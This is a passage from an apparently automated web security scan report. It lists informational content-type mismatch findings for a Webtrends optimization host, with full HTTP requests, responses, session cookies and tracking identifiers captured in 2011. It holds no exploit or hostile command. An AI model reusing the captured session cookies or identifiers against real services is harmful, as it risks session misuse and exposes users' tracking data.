3999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b1244870c1f77575f813e1f6f603fbaf73501f56803 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/private-banking.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=83141D1BF679315B3A6FE0130C26720B; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c73ae63744334ae8cef4967d1912276c4668924ff5e00a6078cb239e3f1b573242cbd9b707a451092fc680a56b548caeb5a3f96f49b427787e772f8662a4191929dc9447c4758dd37c9d02690b0b; _wt.mode-79569=fcdcc722e93200beff43; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a00d8b959

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=D8093C1321BCE6A1782156CDD8E84722; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.63. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.64. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=03955303B3331E793004A3981BAFE30B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
28.65. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
